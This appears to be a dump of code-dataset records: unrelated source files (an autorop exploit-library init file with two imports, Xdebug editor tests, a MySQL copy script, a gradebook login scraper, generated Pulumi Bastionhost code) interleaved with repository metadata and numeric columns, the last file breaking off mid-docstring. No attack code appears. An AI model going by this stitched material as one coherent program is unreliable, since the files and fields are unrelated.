5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 15
|
2020-10-03T05:20:31.000Z
|
2022-03-20T06:19:29.000Z
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 8
|
2020-10-02T09:51:39.000Z
|
2021-04-24T03:14:18.000Z
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 2
|
2021-04-16T06:33:49.000Z
|
2021-09-03T09:21:10.000Z
|
from autorop.call.Custom import Custom
from autorop.call.SystemBinSh import SystemBinSh
| 29.333333
| 48
| 0.863636
| 12
| 88
| 6.333333
| 0.5
| 0.289474
| 0.394737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 88
| 2
| 49
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3f16b9175ddbc53aed5519784666123e0d55491
| 6,964
|
py
|
Python
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 344
|
2015-01-03T01:55:52.000Z
|
2022-01-11T08:52:55.000Z
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 107
|
2015-01-05T12:46:39.000Z
|
2021-03-25T04:56:16.000Z
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 82
|
2015-01-10T16:02:50.000Z
|
2022-01-18T19:25:58.000Z
|
import os

# Resolve the deferrable test-case base class.  Running the tests from inside
# the package uses the plain `xdebug` import; when installed as a Sublime Text
# package the module is namespaced under `SublimeTextXdebug` instead.
try:
    from xdebug.unittesting import XdebugDeferrableTestCase
except ImportError:
    # Was a bare `except:`, which also masked unrelated errors (SyntaxError in
    # the module, KeyboardInterrupt, ...) — only a failed import should fall
    # through to the namespaced form.
    from SublimeTextXdebug.xdebug.unittesting import XdebugDeferrableTestCase
class TestBreakpointStep(XdebugDeferrableTestCase):
    """Integration tests for the step_into / step_out / step_over commands.

    Each test method is a generator: `yield <callable>` hands control back to
    the deferrable test runner, which resumes the test once the yielded
    condition becomes truthy.  The tests drive a real debug session against
    the `breakpoint_step.php` fixture and assert on the contents of the
    Xdebug Breakpoint / Context / Stack panel views.
    """

    # PHP fixture exercised by every test in this class.
    breakpoint_step_file = 'breakpoint_step.php'
    # Absolute path of the fixture on the machine running Sublime Text.
    breakpoint_step_file_local_path = os.path.join(XdebugDeferrableTestCase.local_path, breakpoint_step_file)

    def test_step_into(self):
        """Step from the breakpoint on line 11 into greet() and through it."""
        self.set_breakpoint(self.breakpoint_step_file_local_path, 11)
        self.run_command('xdebug_session_start')
        yield self.window_has_debug_layout
        breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
        context_view = self.get_view_by_title('Xdebug Context')
        stack_view = self.get_view_by_title('Xdebug Stack')
        # Breakpoint is registered but nothing is running yet: context/stack empty.
        self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 11'.format(file_local_path=self.breakpoint_step_file_local_path))
        self.assertViewIsEmpty(context_view)
        self.assertViewIsEmpty(stack_view)
        self.send_server_request(path=self.breakpoint_step_file)

        def context_and_stack_have_content():
            return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
        yield context_and_stack_have_content
        self.assertViewContains(context_view, '$greeting = <uninitialized>')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:11, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
        # Snapshot both panels so the predicate below can detect a redraw.
        context_view_contents = self.get_contents_of_view(context_view)
        stack_view_contents = self.get_contents_of_view(stack_view)

        def context_and_stack_have_different_content():
            return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
        self.run_command('xdebug_execute', {'command': 'step_into'})
        yield context_and_stack_have_different_content
        yield context_and_stack_have_content
        # Now inside greet(): locals exist but $greet is not yet assigned.
        self.assertViewContains(context_view, '$greet = <uninitialized>')
        self.assertViewContains(context_view, '$name = (string) Stranger')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:4, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
        context_view_contents = self.get_contents_of_view(context_view)
        stack_view_contents = self.get_contents_of_view(stack_view)

        # Deliberately redefined: the new closure captures the fresh snapshots above.
        def context_and_stack_have_different_content():
            return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
        self.run_command('xdebug_execute', {'command': 'step_into'})
        yield context_and_stack_have_different_content
        yield context_and_stack_have_content
        # One more step: $greet has been assigned on line 4, we are on line 5.
        self.assertViewContains(context_view, '$greet = (string) Hi')
        self.assertViewContains(context_view, '$name = (string) Stranger')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:5, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))

    def test_step_out(self):
        """Break inside greet() (line 5) and step out back to {main}."""
        self.set_breakpoint(self.breakpoint_step_file_local_path, 5)
        self.run_command('xdebug_session_start')
        yield self.window_has_debug_layout
        breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
        context_view = self.get_view_by_title('Xdebug Context')
        stack_view = self.get_view_by_title('Xdebug Stack')
        self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 5'.format(file_local_path=self.breakpoint_step_file_local_path))
        self.assertViewIsEmpty(context_view)
        self.assertViewIsEmpty(stack_view)
        self.send_server_request(path=self.breakpoint_step_file)

        def context_and_stack_have_content():
            return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
        yield context_and_stack_have_content
        # Stopped inside greet() with both locals populated.
        self.assertViewContains(context_view, '$greet = (string) Hi')
        self.assertViewContains(context_view, '$name = (string) Stranger')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:5, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
        # Snapshot both panels so the predicate below can detect a redraw.
        context_view_contents = self.get_contents_of_view(context_view)
        stack_view_contents = self.get_contents_of_view(stack_view)

        def context_and_stack_have_different_content():
            return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
        self.run_command('xdebug_execute', {'command': 'step_out'})
        yield context_and_stack_have_different_content
        yield context_and_stack_have_content
        # Back in {main} on line 12; greet()'s return value is now assigned.
        self.assertViewContains(context_view, '$greeting = (string) Hello Stranger!')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:12, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))

    def test_step_over(self):
        """Break on line 11 and step over the greet() call without entering it."""
        self.set_breakpoint(self.breakpoint_step_file_local_path, 11)
        self.run_command('xdebug_session_start')
        yield self.window_has_debug_layout
        breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
        context_view = self.get_view_by_title('Xdebug Context')
        stack_view = self.get_view_by_title('Xdebug Stack')
        self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 11'.format(file_local_path=self.breakpoint_step_file_local_path))
        self.assertViewIsEmpty(context_view)
        self.assertViewIsEmpty(stack_view)
        self.send_server_request(path=self.breakpoint_step_file)

        def context_and_stack_have_content():
            return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
        yield context_and_stack_have_content
        self.assertViewContains(context_view, '$greeting = <uninitialized>')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:11, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
        # Snapshot both panels so the predicate below can detect a redraw.
        context_view_contents = self.get_contents_of_view(context_view)
        stack_view_contents = self.get_contents_of_view(stack_view)

        def context_and_stack_have_different_content():
            return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
        self.run_command('xdebug_execute', {'command': 'step_over'})
        yield context_and_stack_have_different_content
        yield context_and_stack_have_content
        # step_over stays in {main}: the call completed and we are on line 12.
        self.assertViewContains(context_view, '$greeting = (string) Hello Stranger!')
        self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:12, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
| 51.585185
| 162
| 0.747702
| 898
| 6,964
| 5.36637
| 0.082405
| 0.079892
| 0.070969
| 0.070969
| 0.938784
| 0.933181
| 0.927163
| 0.927163
| 0.927163
| 0.927163
| 0
| 0.004752
| 0.153935
| 6,964
| 134
| 163
| 51.970149
| 0.813136
| 0
| 0
| 0.821053
| 0
| 0
| 0.142303
| 0.041068
| 0
| 0
| 0
| 0
| 0.273684
| 1
| 0.105263
| false
| 0
| 0.031579
| 0.073684
| 0.242105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b606c803ecdab8796c233d6f0b74f5656877113c
| 23,410
|
py
|
Python
|
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
import time
from qgggzy import settings
import pymysql
import logging

# Long-running worker: every two seconds, copy freshly scraped rows from the
# shared `qgggjy` staging table into the per-province announcement tables.
connect = pymysql.connect(
    host=settings.MYSQL_HOST,
    db=settings.MYSQL_DBNAME,
    user=settings.MYSQL_USER,
    passwd=settings.MYSQL_PASSWD,
    port=settings.MYSQL_PORT,
    charset='utf8',
    use_unicode=False
)
cursor = connect.cursor()

# (table-name prefix, value of qgggjy.area) for every province-level region.
# Drives both insert templates below, replacing 60 hand-copied statements.
# NOTE: the original `hnentrylist` statement was a copy-paste of the `sd`
# one (area '山东', dedup subquery on sdentrylist), so 河南 announcements were
# never copied — fixed here by giving `hn` its correct area.
REGIONS = [
    ('bj', '北京'), ('tj', '天津'), ('hb', '河北'), ('sx', '山西'),
    ('nmg', '内蒙古'), ('ln', '辽宁'), ('jl', '吉林'), ('hlj', '黑龙江'),
    ('sh', '上海'), ('js', '江苏'), ('zj', '浙江'), ('ah', '安徽'),
    ('fj', '福建'), ('jx', '江西'), ('sd', '山东'), ('hn', '河南'),
    ('hubei', '湖北'), ('hunan', '湖南'), ('gd', '广东'), ('gx', '广西'),
    ('hainan', '海南'), ('gz', '贵州'), ('yn', '云南'), ('xz', '西藏'),
    ('shanxi', '陕西'), ('gs', '甘肃'), ('qh', '青海'), ('nx', '宁夏'),
    ('xj', '新疆'), ('bt', '兵团'),
]

# Template for announcement (公告) rows; `not in` subquery deduplicates
# against rows already copied from this source ("qgggjy").
ENTRY_SQL = (
    "insert into {p}entrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) "
    "select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy "
    "where area = '{a}' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') "
    "and id not in (select entityid from {p}entrylist where entity='qgggjy')"
)

# Template for result-publication (公示) rows.
JG_SQL = (
    "insert into {p}entryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) "
    "select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy "
    "where area = '{a}' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') "
    "and id not in (select entityid from {p}entryjglist where entity='qgggjy')"
)

while True:
    print('开始插入数据>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
    try:
        # 公告 — table names and area values come from the trusted REGIONS
        # constant above, never from user input, so string formatting is safe.
        for prefix, area in REGIONS:
            cursor.execute(ENTRY_SQL.format(p=prefix, a=area))
        # 公示
        for prefix, area in REGIONS:
            cursor.execute(JG_SQL.format(p=prefix, a=area))
        connect.commit()
        print('数据插入成功>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
    except Exception:
        print('数据插入失败>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
        # The original `logging.log(error)` raised TypeError: logging.log()
        # needs an int level as its first argument.  logging.exception logs
        # the message plus the full traceback of the caught exception.
        logging.exception('province-table insert failed')
    time.sleep(2)
| 111.47619
| 386
| 0.714994
| 2,914
| 23,410
| 5.741935
| 0.055251
| 0.11475
| 0.068133
| 0.082477
| 0.885967
| 0.885967
| 0.885967
| 0.752092
| 0.745039
| 0.745039
| 0
| 0.000101
| 0.155788
| 23,410
| 209
| 387
| 112.009569
| 0.846531
| 0.000214
| 0
| 0.295567
| 0
| 0.295567
| 0.851252
| 0.373857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004926
| 0.019704
| 0
| 0.019704
| 0.014778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3751d3596a32979b95ddd2523fef9f29e3bf7492
| 173
|
py
|
Python
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 14
|
2019-03-12T22:07:47.000Z
|
2022-03-08T14:05:05.000Z
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 31
|
2018-10-15T16:02:44.000Z
|
2021-04-09T08:13:44.000Z
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 2
|
2020-01-09T06:47:09.000Z
|
2020-12-05T13:21:03.000Z
|
from sosia.establishing.config import *
from sosia.establishing.constants import *
from sosia.establishing.database import *
from sosia.establishing.fields_sources import *
| 34.6
| 47
| 0.83815
| 21
| 173
| 6.857143
| 0.428571
| 0.25
| 0.583333
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092486
| 173
| 4
| 48
| 43.25
| 0.917197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
805d2e10e957e70e749b95821942bd42c89d0b08
| 7,158
|
py
|
Python
|
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class api:
    """Scraping client for the Croatian e-Dnevnik gradebook (ocjene.skole.hr).

    Drives a headless Chrome browser through Selenium.  Every public method
    performs a fresh login, reads one piece of information, closes the
    browser, and returns the value — or ``api.loginFailed`` when the
    credentials are rejected.
    """

    # Sentinel returned by every method when the login does not succeed.
    loginFailed = 'Login failed'

    # XPaths of the data fields read from the site (hoisted so they are
    # defined in exactly one place instead of being repeated per method).
    _GRADE_XPATH = '//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[1]'
    _YEAR_XPATH = '//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[2]'
    _SCHOOL_XPATH = '//*[@id="class-administration-menu"]/div[1]/div/div[2]/div[1]/span[1]'
    _NAME_XPATH = '//*[@id="header"]/div[2]/div/span'
    _USER_NUMBER_XPATH = '//*[@id="page-wrapper"]/div[4]/div/div[2]/span[2]'

    def __init__(self, username, passowrd, path):
        """Store the credentials and the path to the chromedriver binary.

        NOTE: ``passowrd`` keeps the original (misspelled) parameter name
        for backward compatibility with keyword-argument callers.
        """
        self.username = username
        self.password = passowrd
        self.path = path

    def _login(self):
        """Open a headless browser and submit the login form.

        Returns the live driver on success; returns ``None`` (after closing
        the driver) when the login was rejected.  This is the login flow
        that was previously duplicated verbatim in every public method.
        """
        chrome_options = Options()
        chrome_options.add_argument("--headless")
        driver = webdriver.Chrome(self.path, options=chrome_options)
        driver.get("https://ocjene.skole.hr/login")
        driver.find_element_by_name("username").send_keys(self.username)
        driver.find_element_by_name("password").send_keys(self.password)
        driver.find_element_by_xpath('//input[@type="submit"]').click()
        # A successful login redirects to the course overview page.
        if driver.current_url != 'https://ocjene.skole.hr/course':
            driver.close()
            return None
        return driver

    def _read_course_field(self, xpath):
        """Log in, read one element's text from the course page, close the browser.

        Returns ``None`` when the login fails so callers can map that to
        ``self.loginFailed`` without ambiguity.
        """
        driver = self._login()
        if driver is None:
            return None
        value = driver.find_element_by_xpath(xpath).text
        driver.close()
        return value

    def auth(self):
        """Return ``True`` when the credentials are valid, ``loginFailed`` otherwise."""
        driver = self._login()
        if driver is None:
            return self.loginFailed
        driver.close()
        return True

    def grade(self):
        """Return the student's class designation shown on the course page."""
        value = self._read_course_field(self._GRADE_XPATH)
        return self.loginFailed if value is None else value

    def nameSurname(self):
        """Return ``[name, surname]`` of the logged-in student."""
        driver = self._login()
        if driver is None:
            return self.loginFailed
        name, surname = driver.find_element_by_xpath(self._NAME_XPATH).text.split()
        driver.close()
        return [name, surname]

    def userNumber(self):
        """Return the student's user number from the personal-data page."""
        driver = self._login()
        if driver is None:
            return self.loginFailed
        driver.get("https://ocjene.skole.hr/personal_data")
        user_number = driver.find_element_by_xpath(self._USER_NUMBER_XPATH).text
        driver.close()
        return user_number

    def getClassYear(self):
        """Return the school year shown on the course page."""
        value = self._read_course_field(self._YEAR_XPATH)
        return self.loginFailed if value is None else value

    def getSchool(self):
        """Return the school name shown on the course page."""
        value = self._read_course_field(self._SCHOOL_XPATH)
        return self.loginFailed if value is None else value

    def userInfo(self):
        """Return ``[name, surname, grade, userNumber, year, school]``.

        Unlike calling the individual getters, everything is collected in a
        single browser session (one login), matching the original behavior.
        """
        driver = self._login()
        if driver is None:
            return self.loginFailed
        grade = driver.find_element_by_xpath(self._GRADE_XPATH).text
        name, surname = driver.find_element_by_xpath(self._NAME_XPATH).text.split()
        year = driver.find_element_by_xpath(self._YEAR_XPATH).text
        school = driver.find_element_by_xpath(self._SCHOOL_XPATH).text
        driver.get("https://ocjene.skole.hr/personal_data")
        user_number = driver.find_element_by_xpath(self._USER_NUMBER_XPATH).text
        driver.close()
        return [name, surname, grade, user_number, year, school]
| 37.47644
| 127
| 0.659821
| 839
| 7,158
| 5.438617
| 0.091776
| 0.067938
| 0.115494
| 0.129082
| 0.877712
| 0.860837
| 0.860837
| 0.860837
| 0.860837
| 0.860837
| 0
| 0.004911
| 0.203409
| 7,158
| 191
| 128
| 37.47644
| 0.795335
| 0
| 0
| 0.76259
| 0
| 0.057554
| 0.194441
| 0.099316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.115108
| 0.014388
| 0
| 0.129496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
80624d1280a0eb18b210f33d8b8631a74882c8c8
| 17,010
|
py
|
Python
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['HostAccountUserGroupAttachmentArgs', 'HostAccountUserGroupAttachment']
@pulumi.input_type
class HostAccountUserGroupAttachmentArgs:
    # NOTE: tfgen-generated input-args class — do not restructure by hand.
    # Fields are stored via pulumi.set/pulumi.get so the @pulumi.input_type
    # machinery can track them; they are not plain instance attributes.
    def __init__(__self__, *,
                 host_account_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
                 host_id: pulumi.Input[str],
                 instance_id: pulumi.Input[str],
                 user_group_id: pulumi.Input[str]):
        """
        The set of arguments for constructing a HostAccountUserGroupAttachment resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
        :param pulumi.Input[str] host_id: The ID of the host.
        :param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        :param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        # All four arguments are required (no Optional/None defaults here,
        # unlike the companion state class below).
        pulumi.set(__self__, "host_account_ids", host_account_ids)
        pulumi.set(__self__, "host_id", host_id)
        pulumi.set(__self__, "instance_id", instance_id)
        pulumi.set(__self__, "user_group_id", user_group_id)

    @property
    @pulumi.getter(name="hostAccountIds")
    def host_account_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        A list IDs of the host account.
        """
        return pulumi.get(self, "host_account_ids")

    @host_account_ids.setter
    def host_account_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "host_account_ids", value)

    @property
    @pulumi.getter(name="hostId")
    def host_id(self) -> pulumi.Input[str]:
        """
        The ID of the host.
        """
        return pulumi.get(self, "host_id")

    @host_id.setter
    def host_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "host_id", value)

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Input[str]:
        """
        The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "instance_id")

    @instance_id.setter
    def instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_id", value)

    @property
    @pulumi.getter(name="userGroupId")
    def user_group_id(self) -> pulumi.Input[str]:
        """
        The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "user_group_id")

    @user_group_id.setter
    def user_group_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "user_group_id", value)
@pulumi.input_type
class _HostAccountUserGroupAttachmentState:
    # NOTE: tfgen-generated state class — do not restructure by hand.
    def __init__(__self__, *,
                 host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 host_id: Optional[pulumi.Input[str]] = None,
                 instance_id: Optional[pulumi.Input[str]] = None,
                 user_group_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering HostAccountUserGroupAttachment resources.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
        :param pulumi.Input[str] host_id: The ID of the host.
        :param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        :param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        # Unlike the Args class, every field is optional: a state object may
        # describe a partially-known resource, so only set what was given.
        if host_account_ids is not None:
            pulumi.set(__self__, "host_account_ids", host_account_ids)
        if host_id is not None:
            pulumi.set(__self__, "host_id", host_id)
        if instance_id is not None:
            pulumi.set(__self__, "instance_id", instance_id)
        if user_group_id is not None:
            pulumi.set(__self__, "user_group_id", user_group_id)

    @property
    @pulumi.getter(name="hostAccountIds")
    def host_account_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list IDs of the host account.
        """
        return pulumi.get(self, "host_account_ids")

    @host_account_ids.setter
    def host_account_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "host_account_ids", value)

    @property
    @pulumi.getter(name="hostId")
    def host_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the host.
        """
        return pulumi.get(self, "host_id")

    @host_id.setter
    def host_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_id", value)

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "instance_id")

    @instance_id.setter
    def instance_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_id", value)

    @property
    @pulumi.getter(name="userGroupId")
    def user_group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "user_group_id")

    @user_group_id.setter
    def user_group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_group_id", value)
class HostAccountUserGroupAttachment(pulumi.CustomResource):
    # NOTE: tfgen-generated resource class — do not restructure by hand.
    # The two @overload __init__ signatures below exist only for type
    # checkers; the real constructor dispatches to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 host_id: Optional[pulumi.Input[str]] = None,
                 instance_id: Optional[pulumi.Input[str]] = None,
                 user_group_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Bastion Host Host Account Attachment resource to add list host accounts into one user group.
        > **NOTE:** Available in v1.135.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        default_host = alicloud.bastionhost.Host("defaultHost",
            instance_id="bastionhost-cn-tl32bh0no30",
            host_name=var["name"],
            active_address_type="Private",
            host_private_address="172.16.0.10",
            os_type="Linux",
            source="Local")
        default_host_account = []
        for range in [{"value": i} for i in range(0, 3)]:
            default_host_account.append(alicloud.bastionhost.HostAccount(f"defaultHostAccount-{range['value']}",
                instance_id=default_host.instance_id,
                host_account_name=f"example_value-{range['value']}",
                host_id=default_host.host_id,
                protocol_name="SSH",
                password="YourPassword12345"))
        default_user_group = alicloud.bastionhost.UserGroup("defaultUserGroup",
            instance_id="bastionhost-cn-tl32bh0no30",
            user_group_name=var["name"])
        default_host_account_user_group_attachment = alicloud.bastionhost.HostAccountUserGroupAttachment("defaultHostAccountUserGroupAttachment",
            instance_id=default_host.instance_id,
            user_group_id=default_user_group.user_group_id,
            host_id=default_host.host_id,
            host_account_ids=[__item.host_account_id for __item in default_host_account])
        ```
        ## Import
        Bastion Host Host Account can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment example <instance_id>:<user_group_id>:<host_id>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
        :param pulumi.Input[str] host_id: The ID of the host.
        :param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        :param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: HostAccountUserGroupAttachmentArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Bastion Host Host Account Attachment resource to add list host accounts into one user group.
